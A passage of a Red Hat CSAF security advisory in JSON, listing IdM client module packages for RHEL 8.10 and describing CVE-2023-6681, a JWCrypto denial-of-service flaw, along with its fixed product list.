},
"product_reference": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64"
},
"product_reference": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64"
},
"product_reference": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64"
},
"product_reference": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch"
},
"product_reference": "ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64"
},
"product_reference": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64"
},
"product_reference": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src"
},
"product_reference": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch"
},
"product_reference": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch"
},
"product_reference": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch"
},
"product_reference": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src"
},
"product_reference": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src"
},
"product_reference": "python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src"
},
"product_reference": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch"
},
"product_reference": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch"
},
"product_reference": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch"
},
"product_reference": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch"
},
"product_reference": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch"
},
"product_reference": "python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch"
},
"product_reference": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch"
},
"product_reference": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src as a component of idm:client:8100020240417004735:143e9e98 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
},
"product_reference": "pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-6681",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-01-29T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2260843"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in JWCrypto. This flaw allows an attacker to cause a denial of service (DoS) attack and possible password brute-force and dictionary attacks to be more resource-intensive. This issue can result in a large amount of computational consumption, causing a denial of service attack.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "JWCrypto: denail of service Via specifically crafted JWE",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The identified vulnerability within the jwcrypto package, presents a moderate severity concern rather than a important one due to several mitigating factors. While the unbounded PBES2 Count value in PBKDF2 algorithms can potentially facilitate a Denial of Service (DoS) attack, its severity is tempered by the fact that successful exploitation requires specific conditions and considerable computational resources. Additionally, applications not reliant on PBKDF2 can easily exclude it from their algorithms list, further reducing exposure.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
